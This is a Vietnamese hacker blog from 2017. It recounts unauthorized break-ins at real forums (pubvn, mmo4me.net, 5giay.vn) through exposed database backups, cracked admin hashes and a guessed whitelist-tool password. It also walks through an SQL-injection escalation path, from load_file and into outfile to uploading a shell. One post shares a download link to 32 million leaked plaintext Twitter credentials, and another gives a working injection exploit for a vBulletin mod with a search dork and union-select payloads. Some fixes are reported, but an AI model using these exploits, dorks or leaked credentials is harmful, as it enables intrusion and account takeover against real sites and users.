Thấy có vẻ không ổn nên select thêm vài cái email của admin bên pubvn và gởi mail thông báo, có điều là sau gần chục ngày không ai reply nên cũng ráng tìm thử xem có tài khoản facebook của ad nào với cái mail đó không thì ra được 2 admin, report lần 2 cho hai người quản trị này.Mọi thứ vẫn im lặng cho đến ngày hôm sau thì admin Sứt Yêu đã reply lại và confirm Bugs đồng thời tiến hành vá lỗ hổng kèm theo lời cảm ơn.

Hôm sau trong lúc rảnh rỗi mình có xem lại toàn bộ quá trình pentest và thấy còn vài thông tin chưa xử lý dù nó không còn quan trọng nữa thế là lôi mấy hash md5 + salt của các tài khoản quản trị để tiến hành dùng Hashcat brute force với thuật toán md5(md5($pass).$salt)kết quả là dò ra được 2/4 mật khẩu của admin pubvn, lúc này mình cũng có thử đăng nhập nhưng một tài khoản bị cấm truy cập, tài khoản còn lại đăng nhập vào forum bình thường nhưng không vào được AdminCP của Vbulletin vì bên pubvn có thêm firewall ở bước này nên hệ thống cũng không ảnh hưởng gì khi tồn tại lỗ hổng này.Mình tiếp tục gởi thông báo lần 3 qua facebook cho admin để các admin thay đổi luôn thông tin này cho an toàn.

Kết thúc một cuộc tình chóng váng giữa Concobe và Pubvn, lại tiếp tục về mới phimmoi như mọi khi.

Thứ Tư, 26 tháng 4, 2017

Diadiemanuong.com và lỗ hổng vẫn chưa được fix.

Thật tình thì mình không có ý định viết bài này nhưng thật sự là thấy điều này ảnh hưởng đến rất nhiều người dùng ở VN nên đành phải nói lên vài lời để bạn nào đang sử dụng hoặc có tài khoản bên này hãy đổi mật khẩu mới và nhớ rằng đừng dùng chung mật khẩu với các tài khoản nào kẻo bị tấn công gián tiếp ảnh hưởng đến thông tin của các bạn.

Đầu tháng 4 mình có vô tình phát hiện ra lỗ hổng bảo mật ở mức rất cơ bản của admin, mình đã gởi email thông báo đến 2 địa chỉ email của diadiemanuong nhưng không thấy reply và lỗ hổng vẫn tồn tại, cách đây hai ngày mình kiểm tra lại email không thấy hồi âm nên có kiểm tra lại và lỗ hổng vẫn còn nên mình tiếp tục gởi thêm email cảnh báo đến 2 địa chỉ email của diadiemanuong.com, thông báo gởi thành công nhưng vẫn không có hồi âm, bug vẫn tồn tại.



Đành viết vài dòng để nhắc nhở đến những bạn nào đang có tài khoản ở diadiemanuong thì cẩn thận kẻo bị ảnh hưởng nếu có ai đó tấn công vào với mục đích xấu.

Concobe

Thứ Ba, 25 tháng 4, 2017

Tôi đã pwn diễn đàn mmo4me.net thế nào.

Được sự đồng ý của admin NEO sau khi report lỗ hổng và bạn ấy đã fix hết lỗ hổng thì mình mới bắt đầu viết bài này để chia sẻ cho các bạn hướng tấn công mà mình đã dùng trong trường hợp này.


Mọi thứ bắt nguồn từ lỗi sơ hở của admin khi sài công cụ backup CSDL MysqlDumper để sao lưu CSDL trước đây và để lại thư mục công cụ đó trên server với tên /msd/ một cái tên khá phổ biến nằm trong tool của mình tổng hơp, dựa vào thói quen của các admin khi quản lý mã nguồn và CSDL.Tuy nhiên điểm chính yếu là những thông tin kết nối vào CSDL trong file config.php đã được thay đổi không còn quyền truy cập trực tiếp vào CSDL của mmo4me.net nữa nên mình ngồi xem logs.Logs sao lưu CSDL mà công cụ này tạo ra khi các bạn sử dụng để backup hay restore database, và một chút may mắn đã mỉm cười với mình khi thử dùng tên file đã sao lưu nằm trong thư mục /msd/work/backup/ten_file_backup_csdl.sql.gz đã tồn tại.

Mình có trong tay CSDL đã được backup của admin mmo4me.net cho forum mã nguồn xenforo, cũng khá phức tạp vì xenforo có nhiều tối ưu về bảo mật hơn một số mã nguồn diễn đàn phổ biến khác, đặc biệt là ở thuật toán mã hóa mật khẩu cũng tốt hơn rất nhiều khi dùng thuật toán bcrypt để mã hóa, mình có full info của admin trong CSDL gồm username:hash password:email.

Lúc này thì bắt đầu mình thấy có chút khó khăn xuất hiện vì với thuật toán này nếu brute force cũng mất khá nhiều thời gian, nên mình ngồi tổng hợp lại toàn bộ thông tin mà mình có được ở trong CSDL và trong quá trình thu thập thông tin để tạo thành một bộ wordlist có mối quan hệ gần nhất với victim này, bắt đầu brute force với thuật toán bcrypt wordlist đó lần thứ nhất không thành công, cũng khá thất vọng nhưng mình chưa từ bỏ, đành ngồi viết lại cái rules brute force dành riêng cho victim này, gồm những kiểu đặt mật khẩu phổ biến của các admin, như chữ hoa, chữ thường, thêm số, ký tự đặc biệt phổ biến, đổi chỗ,...Và lại tiếp tục brute lại với bộ wordlist đó, lần này thì sự kết hợp đó đã mang lại thành công.



Mật khẩu của admin đã có gồm chuỗi với 8 ký tự chữ thường không viết hoa được cắt ra từ một phần địa chỉ email của admin, kèm theo một dãy số 7 ký tự khá phổ biến mà mình đã thấy trong quá trình tổng hợp thông tin của admin, lần này sự kết hợp giữa rules và wordlist đã cho ra kết quả thật sự.

Giờ thì đã có đầy đủ những thứ cần thiết, login vào acc admin trên forum để test xem sao và... Chào mừng bạn quay lại diễn đàn...Dòng chữ ấy mang lại quá nhiều cảm xúc khó tả =]] Hăm hở click thẳng vào admin để đăng nhập vào admin control của forum xenforo nhưng ...Một cái trang trắng nhách như mắt ma xuất hiện làm tụt hết cảm xúc các bạn à, mất tầm 30 giây để lấy lại cảm xúc vì bị hụt một vố quá căng =)).Lẽ nào lại có thêm một bước xác thực nữa trước khi vào được admin control của victim chăng?Nghĩ đến đây thì mình liền quăng domain vào cái tool cóc ghẻ mình tổng hợp và hay sài, cho nó scan những công cụ mà các bài viết hướng dẫn bảo vệ admin.php, admincp,...đầy trên mạng và một lần nữa kinh nghiệm làm checker của mình gần chục năm đã khiến cho may mắn phải mỉm cười với mình :3

Một công cụ để thêm ip của mình vào danh sách whitelist thì mới có quyền dòm ngó vào admin control hiện ra, thấy vui vãi, click vào cái link và lại một lần nữa hụt hẫng, nguyên cái form yêu cầu nhập mật khẩu để quản trị cái tool addIP đó khiến tim mình rạn nứt :(( .Đến đây mình nghĩ có lẽ nên dừng lại được rồi, nên ngồi mở Lạc Trôi của sếp lên nghe và nó lạc trôi thật các bạn à, tự nhiên thấy bừng sáng với cái ý tưởng rất hữu lý bèn mở lại link tool addIP đó và điền thông tin mình nghĩ vào, thật không thể tin được,IP của bạn đã được thêm vào danh sách.Đang trôi nên thả trôi luôn lao vào /admin.php xem sao? thành công mỹ mãn.Kết thúc quá trình tấn công với nhiều cung bậc cảm xúc lên xuống tá lả.



Quên mất, nói thêm là cái pass mà mình nghĩ ra được nó nằm ở cái dãy 7 chữ số của cái pass đăng nhập vào tài khoản của admin đã brute ra ở trên đó mấy chế.

Tóm tắt toàn bộ quá trình:
1. Scan thông tin dựa vào thói quen admin và phát hiện công cụ backup đồng thời có luôn CSDL trong tay.
2. Brute force mật khẩu admin thành công (dựa vào thông tin thu thập và tự sáng tác rules để brute).
3. Tiếp tục scan thói quen bảo mật của admin và gặp may mắn khi scan ra cũng như lạc trôi có pass.
4. Login, chụp hình, sent email report cho admin, sau gần 1 tuần thì hỏi ý kiến admin NEO và public bài viết.

P/s: Thông tin là thứ rất quan trọng trong quá trình tấn công, chính vì thế đừng bao giờ bỏ qua bất kỳ thông tin nào của victim trong quá trình thu thập.Tận dụng triệt để thì thành công sẽ mỉm cười thôi.

Concobe

Thứ Sáu, 7 tháng 4, 2017

Social engineering là gì?

Social engineering là phương pháp phi kỹ thuật đột nhập vào hệ thống hoặc mạng công ty. Đó là quá trình đánh lừa người dùng của hệ thống, hoặc thuyết phục họ cung cấp thông tin có thể giúp chúng ta đánh bại bộ phận an ninh. Social engineering là rất quan trọng để tìm hiểu, bởi vì hacker có thể lợi dụng tấn công vào yếu tố con người và phá vỡ hệ thống kỹ thuật an ninh hiện tại. Phương pháp này có thể sử dụng để thu thập thông tin trước hoặc trong cuộc tấn công.

Social engineering sử dụng sự ảnh hưởng và sự thuyết phục để đánh lừa người dùng nhằm khai thác các thông tin có lợi cho cuộc tấn công hoặc thuyết phục nạn nhân thực hiện một hành động nào đó. Social engineer (người thực hiện công việc tấn công bằng phương pháp social engineering) thường sử dụng điện thoại hoặc internet để dụ dỗ người dùng tiết lộ thông tin nhạy cảm hoặc để có được họ có thể làm một chuyện gì đó để chống lại các chính sách an ninh của tổ chức. Bằng phương pháp này, Social engineer tiến hành khai thác các thói quen tự nhiên của người dùng, hơn là tìm các lỗ hổng bảo mật của hệ thống. Điều này có nghĩa là người dùng với kiến thức bảo mật kém cõi sẽ là cơ hội cho kỹ thuật tấn công này hành động.

Thông thường, mọi người không nhận thấy sai sót của họ trong việc bảo mật, mặc dù họ không cố ý. Những kẻ tấn công đặc biệt rất thích phát triển kĩ năng về Social Engineering và có thể thành thạo đến mức những nạn nhân của không hề biết rằng họ đang bị lừa. Mặc dù có nhiều chính sách bảo mật trong công ty, nhưng họ vẫn có thể bị hại do tin tặc lợi dụng lòng tốt và sự giúp đỡ của mọi người.

Những kẻ tấn công luôn tìm những cách mới để lấy được thông tin. Họ chắc chắn là họ nắm rõ vành đai bảo vệ và những người trực thuộc – nhân viên bảo vệ, nhân viên tiếp tân và những nhân viên ở bộ phận hỗ trợ – để lợi dụng sơ hở của họ. Thường thì mọi người dựa vào vẻ bề ngoài để phán đoán. Ví dụ, khi nhìn thấy một người mặc đồng phục màu nâu và mang theo nhiều hộp cơm, mọi người sẽ mở cửa vì họ nghĩ đây là người giao hàng. Hay khi bạn nhặt được một chiếc USB bạn có thể rất vô tư cắm nó ngay vào máy tính để xem nó là của ai và chứa thông tin gì. Nhưng đó có thể chính là nguồn phát tán virus và mã độc đến bạn, tổ chức và người thân của bạn.

Nguồn bài viết từ trang: http://securitydaily.net/social-engineering-va-cac-thu-thuat-tap-1/

Tôi đã dùng phương pháp này ra sao?

Một người anh rất thân của tôi cũng là dân IT và có niềm đam mê vào những thông tin, mánh khóe của giới bảo mật nhưng vì công việc và cuộc sống có quá nhiều bộn bề nên anh không có cơ hội để tìm hiểu sâu về nó, sau vài lần report bug của website mà anh ấy đang quản lý thì những thắc mắc ấy lại trỗi dậy, nên tôi quyết định áp dụng phương pháp Social engineering và thành công ngoài sự mong đợi, có lẽ sau khi viết bài này thì anh ấy sẽ nhận ra rằng anh ấy cũng đã mắc một sai lầm trong khâu bảo mật của mình và  chắc chắn là chuyện này sẽ không còn xảy ra trong tương lai vì những nguy hiểm tiềm ẩn mà tôi trình bày bên dưới:

Tôi và anh trao đổi, nói chuyện và anh cũng mở lòng chia sẻ là anh đang trong quá trình chuyển đổi mã nguồn website từ nguồn đóng sang nguồn mở, như mọi lần thì tôi cũng đều giúp anh pentest và chỉ ra những điểm yếu mà anh ấy đang mắc phải để khắc phục cho hệ thống an toàn thêm, lần này cũng không ngoại lệ, sau khi kết thúc thì hôm sau tôi chủ động hẹn anh ấy và anh em có một buổi ăn trưa tuyệt vời.

Trong buổi ăn trưa tôi cũng có trình bày những hướng tấn công phổ biến mà các hacker hay sử dụng từ webapp, đến hệ thống, những lỗ hổng nào ở tầng webapp phổ biến và mức độ nguy hiểm của nó,...và đi sâu xuống tầng hệ thống, kernel,...toàn những thông tin thực tế mà tôi đúc kết từ quá trình pentest của chính bản thân tôi khi gặp phải và cách xử lý ra sao?, khắc phục như thế nào?...Thú thật là đến thời điểm hiện tại trong bữa ăn trưa thì tôi vẫn chưa hề đụng được vào hệ thống mới mà anh ấy vừa xây dựng.

Trong bữa trưa, ngoài trình bày và chia sẻ thì tôi cũng có "hỏi thăm" thêm những thông tin quản trị của hệ thống đó gồm những ai, họ làm gì và thông tin ra sao, để tôi có thêm chút cơ hội trong quá trình tấn công sau này tuy nhiên những thông tin này vẫn chỉ dừng lại ở mức để tham khảo  và vẫn chưa có thêm bất kỳ info nào giúp tôi có thể leo cao hơn vào hệ thống của anh ấy cả, tôi vẫn chưa từ bỏ, sau khi kết thúc bữa trưa, tôi và anh chia tay nhau, trên đoạn đường ngắn ngủi thì tôi cũng có gợi thêm vài điều để củng cố niềm tin và đẩy anh ấy tới suy nghĩ quyết định sẽ mở một tài khoản cho tôi truy cập vào hệ thống của anh ấy, thật tuyệt vời phải không các bạn?

Tuy nhiên với quyền của tài khoản tôi đang nắm giữ thì chỉ đủ để nắm rõ hơn thông tin về các thành viên admin đang quản trị hệ thống đó và tài khoản của tôi vẫn không làm gì được hơn, và lúc này tôi quyết định chơi bài ngửa.Tôi nêu hẳn ra những điểm nguy hiểm của một tài khoản full quyền sẽ làm được những gì, đi xa đến đâu, ảnh hưởng như thế nào và thuyết phục anh ấy gán full quyền cho tài khoản mà tôi đang giữ  để giúp anh kiểm tra ở tầng cao hơn vì có khi có người quản trị mắc sai lầm ở tầng này, vì tin tưởng tôi nên anh đã thực hiện việc này và hoàn toàn không nghi ngờ gì về tôi cả, vốn dĩ trước giờ tôi cũng toàn giúp anh và chưa hề phá phách gì nên niềm tin của anh đối với tôi là rất lớn, điều này đã quyết định sự thành công của toàn bộ quá trình tấn công của tôi với phương pháp Social engineering này.

Tôi dừng quá trình tấn công ngay sau khi tài khoản của tôi có đủ quyền vì tôi đã thành công trong phương pháp Social engineering, bởi vì với tài khoản full quyền này thì tôi hoàn toàn có thể tải lên mã độc và chiếm toàn quyền server nhưng đây chỉ là minh họa cho một hình thức tấn công phi kỹ thuật và tôi muốn trình bày ra để anh ấy nhận ra được điểm yếu và sai lầm của anh ấy trong quá trình bảo vệ thành quả của mình đã tạo ra.

Và tôi tin chắc rằng sau bài này, thì anh ấy sẽ không còn share cho tôi tài khoản nào nữa :D, tức là trong tương lai có thể tôi sẽ gặp phải nhiều khó khăn hơn trong quá trình pentest hệ thống khác của anh ấy, nhưng nếu điều ấy xảy ra thì tôi hoàn toàn vui vẻ và mừng rỡ vì anh ấy đã nhận ra được lỗ hổng của hệ thống anh ấy đang quản lý chính là vấn đền về niềm tin về con người và bị tôi khai thác.


Kết bài: Cho dù bạn tin tưởng ai đó thật nhiều thì cũng luôn tỉnh táo, đừng giao thông tin nhạy cảm cho người đó, nhất là ... mấy tên IT có máu hắc hiếc thì càng phải giữ thật kỹ kẻo,... lên báo đấy :D.

Concobe

Thứ Sáu, 24 tháng 3, 2017

Lộ tập tin sao lưu mã nguồn, một lỗ hổng nguy hiểm.


Thời gian gần đây khi pentest khá nhiều website mà tôi gặp được một phương thức duy nhất đó là scan các tập tin nhạy cảm, những tập tin sao lưu và luôn cả những công cụ sao lưu dữ liệu phổ biến thì tôi nhận thấy rằng tình trạng mắc lỗi bảo mật cơ bản này diễn ra khá phổ biến, có khoảng 45% những site mà tôi lên danh sách để thử tool tồn tại các điểm yếu dạng này.

Bình thường các admin, kỹ thuật viên thường không để ý đến những tập tin đã sao lưu toàn bộ mã nguồn cũng như CSDL và thông tin quan trọng của hệ thống đang chạy vì có thể do sơ xuất hoặc họ không nghĩ rằng những file sao lưu đó không ảnh hưởng gì hoặc đơn giản là họ suy nghĩ trang web của họ có ai thèm dòm ngó,....

Nhưng đối với một hacker thì đây lại là một nguồn thông tin vô cùng quý giá và sẽ giúp họ giảm thiểu được rất rât nhiều công sức mới có thể có được những thông tin quan trọng như thế, và đương nhiên họ sẽ sử dụng triệt để những thông tin này để leo lên nắm quyền cao nhất mà họ có thể tận dụng và rồi tất nhiên người tổn hại chính là những victim bất cẩn đó.

Tôi sẽ phân tích những điểm yếu khi các bạn để lộ một trong những thông tin quan trọng dưới đây và mức độ ảnh hưởng khi kết hợp lại với nhau ra sao.

1. Lộ toàn bộ mã nguồn khi backup source và không xóa sau khi đã tải về máy để lưu trữ.
Ở tình huống này thì những thông tin mà các bạn bị lộ là toàn bộ và chẳng còn gì để mất nữa cả :)

- Với thông tin này thì tôi sẽ xem xét đến các thông tin quan trọng trong các tập tin lưu cấu hình kết nối đến CSDL của các bạn.Sau đó tôi sẽ dùng những thông tin đó để thử kết nối đến CSDL các bạn đang sử dụng qua những công cụ có sẵn vd: phpMyAdmin trên server nếu các bạn có cài đặt nó và cho phép truy cập, hoặc các bạn open port cũng như cho phép connect vào CSDL từ bên ngoài.Đến đây thì tôi hoàn toàn có thể chiếm quyền quản trị của bất kỳ người admin nào, hoặc bất kỳ thành viên nào đang tồn tại trên hệ thống của các bạn, chưa kể nếu các bạn gán đầy đủ quyền cho user quản trị CSDL đang sài, hoặc sử dụng user có quyền cao nhất là root thì khả năng chiếm được server các bạn sẽ tăng lên trên 90%.

- Ngoài ra tôi cũng sẽ tận dụng những thông tin như username, password các bạn tạo cho việc connect vào CSDL đó để thử kết nối vào một số dịch vụ quan trọng khác như SSH, FTP, Panel, Email,...Nếu may mắn mỉm cười vì các bạn sài chung mật khẩu cho các dịch vụ đó thì các bạn lại gặp nguy hiểm nhanh hơn.

- Cũng có thể trong mã nguồn sẽ kèm theo luôn cả bản sao lưu của Database trang web các bạn, và đây lại là một nguồn thông tin quý giá cho tôi khai thác, trong tình huống này tôi sẽ select ra những thông tin của người quản trị và tiến hành giải mã những mật khẩu đã được mã hóa để đăng nhập vào quyền quản trị rồi leo cao hơn để vào server các bạn.

2. Lộ toàn bộ mã nguồn khi backup source nhưng không có thông tin nào tận dụng được như ở mục số 1.

Với tình huống này thì có thể các bạn không sao lưu CSDL của các bạn, hay thông tin trong các tập tin cấu hình không sử dụng được để kết nối từ ngoài vào thì xem như các bạn có chút may mắn rồi, tuy nhiên mọi việc vẫn chưa dừng lại đây vì khi đã có được mã nguồn của các bạn tôi sẽ tiếp tục đào sâu hơn và tìm kiếm những lỗ hổng trong mã nguồn trang web của các bạn rồi tận dụng nó để tiếp tục tấn công leo cao hơn.
Ngoài ra nếu các bạn sài chung với vài trang web khác trên cùng một server thì tôi cũng có thể tận dụng thông tin kết nối CSDL đó sau khi đã khai thác vào được một trang nằm cùng server và lúc này thì có lẽ tôi không còn tốn công để local qua host các bạn mà chỉ việc kết nối thẳng đến CSDL của các bạn bởi lúc này tôi đã có quyền quản lý trên hệ thống (local) của các bạn rồi.

3. Kết luận và giải pháp.
Tóm lại như các bạn đã đọc ở mục 1 & 2 thì tôi đã gợi ý ra những hướng tấn công lợi dụng vào một điểm yếu duy nhất của các bạn là để lại tập tin backup mã nguồn và tôi phát hiện thấy, và kết quả thì các bạn cũng có thể thấy rõ rồi.Cách khắc phục thì cũng khá rõ ràng rồi đó là:

- Không sao lưu mã nguồn và để lại ngay trên server của mình với tên tập tin quá dễ đoán vd: tendomain.zip, public_html.zip, html.zip,...
- Không sử dụng chung mật khẩu quản trị CSDL cho nhiều dịch vụ khác vd: SSH, FTP, Admin, Email,...
- Hạn chế sử dụng các công cụ hỗ trợ quản trị CSDL với cài đặt và sử dụng mặc định, vd: phpMyAdmin có thể đổi thành tên truy cập mà chỉ có mình bạn biết.
- Không mở quyền cho truy cập trực tiếp từ ngoài vào CSDL của các bạn vd: chỉ cho kết nối vào CSDL ở localhost.
- Thay đổi lại toàn bộ thông tin quan trọng trên hệ thống vd: username, password của toàn bộ dịch vụ, kiểm thử lại mã nguồn để tránh bị găm mã độc,...
- Gởi lời cảm ơn đến người đã thông báo lỗ hổng cho các bạn, vì biết đâu một ngày nào đó họ sẽ lại thông báo cho bạn một lỗ hổng mới của các bạn.

Concobe

Thứ Tư, 22 tháng 3, 2017

Kịch bản tấn công vào một hệ thống với lỗ hổng SQL Injection

Đây là một tình huống thực tế và cũng khá phổ biến khi kiểm thử những hệ thống lớn và nhỏ tại VN mà tôi rút ra được, hôm nay cũng chia sẻ một phần nhỏ của quá trình pentest và những hướng xử lý phù hợp khi gặp, hoặc những bạn nào đang bí ý tưởng có thể tham khảo.

1. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là user không full quyền.
2. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là root hoặc user full quyền.
3. Hướng khắc phục dựa vào những điểm yếu ở trên.


Chúng ta bắt đầu đi vào chi tiết của từng mục.

1. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là user không full quyền.
Đây là tình huống gần như là tuyệt đối khi victim tồn tại lỗ hổng SQLi rồi, vì đại đa số các trang web thường sử dụng các dịch vụ share hosting và những nhà cung cấp dịch vụ này hiển nhiên không bao giờ cấp full quyền cho các bạn cả, và lúc này chúng ta sẽ phải tận dụng tối đa những thông tin mà chúng ta thu gom được trong quá trình khai thác lỗi SQLi và trong quá trình thu gom thông tin victim để tổng hợp những thông tin chính yếu, quan trọng để xử lý.

Với trường hợp này thì theo Concobe có lẽ tùy vào mục đích của mỗi người lúc đó sẽ có nhu cầu khai thác tới đâu, vd các bạn chỉ cần select được những thông tin lưu trữ trong database thì đến đây các bạn đã hoàn toàn thành công khi tìm được lỗ hổng SQLi, nhưng với những ai pentest và những ai có nhu cầu cao hơn, muốn chiếm được càng nhiều thông tin và quyền quản trị của victim càng tốt thì sẽ phải tiếp tục sử dụng những thông tin có được.

Mình thường tổng hợp các thông tin và dùng các công cụ để tạo ra một bộ từ điển tạm gọi là sát nhất với những thông tin của victim mà mình có được, sau đó mình sẽ dùng các công cụ để brute-force những mật khẩu của victim dựa vào bộ wordlist mới generate đó.Nếu may mắn thì các bạn có thể có được mật khẩu và đăng nhập vào khu vực quản trị của admin để bắt đầu upload lên server victim cái mà các bạn muốn upload (các bạn hiểu ý tôi rồi chứ :v ).

Còn lỡ như hôm đó các bạn mới ăn cơm hay bún,...với mực thì có lẽ các bạn nên để qua hôm sau hãy tiến hành brute-force vì theo kinh nghiệm của tôi thì nó đen thật đấy =]].Nói chơi cho vui thôi chứ không ra thì chịu chứ biết làm sao giờ?
Nói chứ đến đây cũng không hẳn là tịt hoàn toàn đâu, các bạn cũng nên ngó kỹ qua mã nguồn và cách hoạt động cũng như thông tin trong các table của database đó, biết đâu lại có cách để reset password và mình select ra rồi may mắn mỉm cười thì sao.Nhớ nhé, đừng từ bỏ, chừng nào khó quá thì cho qua thôi.


2. Hệ thống có website tồn tại lỗ hổng SQLi với quyền quản trị database là root hoặc user full quyền.

a. Dùng trình duyệt và câu truy vấn SQLi để ghi file vào hệ thống.
Cũng như trên nhưng ở tình huống này chúng ta có một thông tin giúp quá trình pentest thuận lợi hơn để leo cao hơn bởi user quản lý Database nếu được gán (Grant) full quyền sẽ tương đương với user root của hệ quản trị csdl đó :D và có thêm hai quyền cho phép chúng ta load_file và into outfile.

Với Load_file chúng ta có thể tận dụng thông qua SQLi để load lên nội dung những file tồn tại trên hệ thống đó nếu những file đó không được cấu hình và phân quyền cẩn thận, mà đa phần theo mình thấy là load được, nhất là các file lưu cấu hình CSDL website, lưu cấu hình hệ thống để nắm rõ hệ thống đang sử dụng công nghệ nào và gồm những gì để chúng ta tiến hành ghi file vào hệ thống thông qua into outfile.

Với Into outfile thì sau khi chúng ta có thông tin từ quá trình load_file như đường dẫn các thư mục của website victim, thông tin user và mật khẩu quản trị csdl,... chúng ta dùng chính query để khai thác SQLi và tiến hành ghi file vào hệ thống, rồi chiếm full quyền.

b. Dùng trình duyệt kết hợp với công cụ quản trị CSDL để ghi file vào hệ thống.
Với cách này thì cũng hên xui là chính (có thể không tìm được thư mục cho phép ghi (chmod 777) file thì sao) nhưng mình vẫn nêu ra để các bạn có thêm hướng xử lý nếu gặp phải, sẽ giúp quá trình thực hiện nhanh hơn và linh hoạt hơn so với query trên trình duyệt để ghi file.

Nếu vô tình victim có sử dụng công cụ quản lý CSDL như phpMyAdmin thì các bạn dùng nó kết hợp với thông tin đã load được từ các file config gồm username password quản lý CSDL ở bước 1 để đăng nhập và thực thi các câu truy vấn cho dẽ dàng hơn.Ngoài ra các bạn cũng có thể dùng phpMyAdmin để tiến hành update CSDL để chiếm quyền của user quản trị dễ dàng hơn rồi vào khu vực quản trị website để upload cái cần upload :(.

Nếu vẫn không tồn tại phpMyAdmin thì các bạn cũng nên thử thêm các công cụ hỗ trợ remote connect từ ngoài vào CSDL như Navicat,... để thử vận may, vì đa phần hiện nay mặc định khi cài đặt các trình quản lý CSDL đều không cho phép connect từ ngoài vào vì lý do an toàn, nhưng dù gì cũng cùng đường rồi, thử đi biết đâu lúc cài đặt lão admin lười biếng chọn next, next, yes, yes hết thì sao :D

Tóm lại phần 1 & 2 đơn giản gồm có:
- Lỗi SQL injection.
- Không có full quyền, brute-force và tìm kiếm vận may.
- Có full quyền và dùng load_file và into outfile để upload hàng họ lên.
- Tận dụng những công cụ và thông tin có sẵn để tạo thuận tiện trong quá trình pentest.


3. Hướng khắc phục dựa vào những điểm yếu ở trên.
- Kiểm thử, giám sát và quản lý hệ thống liên tục để tìm kiếm lỗ hổng và fix theo hướng chủ động.
- Cấu hình và phân quyền chặt chẽ nhưng file cấu hình của hệ thống như file config chứa thông tin CSDL website, file cấu hình web, host,...
- Cấu hình và phân quyền chặt chẽ nhưng thư mục của hệ thống đặc biệt không phân quyền 777 cho thư mục để tránh bị ghi file vào.
- Không cho phép kết nối vào CSDL từ bên ngoài, không sử dụng mặc định các công cụ quản lý dữ liệu như phpMyAdmin.
- Ngày ngày thắp nhang khấn vái và làm việc thiện để không bị ai dòm ngó, hoặc có bị dòm ngó cũng được họ thông báo fix lỗi chứ không phá hoại, nhớ cảm ơn và ủng hộ những người đó nếu có điều kiện.

Concobe một chiều rảnh rỗi.

Thứ Sáu, 17 tháng 2, 2017

Link download 32 triệu tài khoản twitter bị hack và chia sẻ

Passwords for 32M Twitter accounts may have been hacked and leaked

There is yet another hack for users of popular social media sites to worry about. Hackers may have used malware to collect more than 32 million Twitter login credentials that are now being sold on the dark web. Twitter says that its systems have not been breached.
“We are confident that these usernames and credentials were not obtained by a Twitter data breach – our systems have not been breached. In fact, we’ve been working to help keep accounts protected by checking our data against what’s been shared from recent other password leaks,” a Twitter spokesperson said.

 
 Mấy ngày nay thông tin về việc 32 triệu tài khoản của twitter gồm email và mật khẩu dạng plaintext đang được rao bán trên chợ đen và được chia sẻ rộng rãi ở các trang web, facebook và các mạng xã hội, đây là vấn đề cấp bách và lớn cho những ai đang sử dụng Twitter hay mau chóng đổi mật khẩu của mình càng sớm càng tốt để tranh bị mất tài khoản, bên cạnh đó nếu bạn nào đang sử dụng chung một mật khẩu đó với các tài khoản khác thì cũng nhanh chóng đổi mật khẩu mới để thông tin cá nhân được an toàn.



Tuy nhiên theo thông tin chính thức từ Twitter thì những thông tin này do hacker dùng mã độc để thực hiện đánh cắp và tổng hợp lại và rao bán trên chợ đen chứ hệ thống chính của họ vẫn không bị tấn công và mọi thứ vẫn trong tầm kiểm soát.

Bên Twitter cũng có đưa ra biện pháp hạn chế rủi ro và giúp người dụng bảo vệ tài khoản của họ bằng cách kiểm tra những dữ liệu bị rò rỉ và dữ liệu trên hệ thống và thông báo đến những ai đang bị ảnh hưởng từ vụ rò rỉ này để họ khắc phục sớm nhất.

Cuối cùng tôi cũng chia sẻ link download 32 triệu tài khoản này gồm email - mật khẩu không mã hóa, để những ai có nhu cầu tìm hiểu và sử dụng tùy theo mục đích cá nhân. Link download tôi chia sẻ của một người nào đó đã chia sẻ lên mạng, không phải do tôi upload lên, các bạn nên kiểm tra trước khi sử dụng cho an toàn.


Link: https://mega.nz/#!pkJl2QQR!_nWYeIZCF4LGOh2k20Y9X9tl3YPz4_Y1DF4I7vdpKws
File name: Twitter.zip
728.3 MB

Concobe

Thứ Năm, 16 tháng 2, 2017

Tôi đã hack diễn đàn 5giay.vn sử dụng xenforo như thế nào.

Sáng 15-02-2017 trong lúc trao đổi ở hội kín của những thành viên coi nhau như là anh em từ thời XgR còn sống và vẫn âm thầm sống với nhau tới hiện tại, chúng tôi có nhận được một cái lỗ hổng của Xenforo, máu dồn đến nơi cần dồn và ngồi thử hàng với một số trang sài Xenforo lớn ở VN
kết quả cũng có khá nhiều trang mắc lỗ hổng này, trong đó có www.5giay.vn một trang web rao vặt lớn mà ai cũng biết.

Ngồi thử Inject vài câu truy vấn cơ bản và nhận ra là hệ thống không có cản lọc, chỉ cần dùng những gì cơ bản nhất của SQL Injection cũng có thể lấy được những thông tin cần thiết như:





user(), database(), version() : 5s_u1@memcachehaproxy.5giay.vn:5s_db1:5.6.24-log

Nhận thấy điều này có thể gây ảnh hưởng lớn đến hệ thống nên tôi select vài thông tin email của admin và soạn email thông báo để gởi cảnh báo lỗ hổng đến họ, lỗ hổng đã được fix vào ngày hôm sau và tôi nhân được email cảm ơn từ BQT diễn đàn 5giay.vn.




Những ai đang sử dụng mã nguồn Xenforo xin hãy ngay lập tức update mã nguồn của mình lên version mới nhất để tránh tổn thất, bởi exploit này cũng có khá nhiều người biết và đang sử dụng nó rồi.


Quá trình thông báo:
15-02-2017 : Phát hiện lỗ hổng.Thông báo tới BQT diễn đàn 5giay.vn
...
16-02-2017 : Bug được fix trong buổi sáng, chiều nhận được email reply cảm ơn.Confirm là bug đã được fix, viết bài lên blog.


Kiểm thử bởi Concobe

Thứ Tư, 8 tháng 2, 2017

Lỗi SQL injection của mod Fun Shop trên Vbulletin

Như đã hứa thì hôm nay mình sẽ cung cấp một cái bug của 1 mod cũng khá nhiều forum đang sử dụng bị dính lỗi SQL injection và có thể bị khai thác và chiếm quyền, dưới đây là thông tin lỗi:

Mod lỗi: Fun Shop - Hệ Thống Shop Vui Nhộn trên diễn đàn Vbulletin
Author: http://www.vietvbb.vn/up/showthread.php?t=43945
version: All
Dork: inurl:/fshop.php?do=buy&id=
link lỗi: /fshop.php?do=buy&id=SQL Injection
Exploit by: concobe & bula -VHB- huynhdegroup.net

Điều kiện bắt buộc phải có là:
1. victim có cài mod Fun Shop
2. Attacker phải có tài khoản trên victim và đã login vào.


Query giả sử id=6:

/fshop.php?do=buy&id=-6' union select 1,2,3,4,5,6,7,8,9,10-- -
cột lỗi gồm 5,6,7,8

lấy version() :

/fshop.php?do=buy&id=-6' union select 1,2,3,4,version(),6,7,8,9,10-- -

xxx xxx xxx

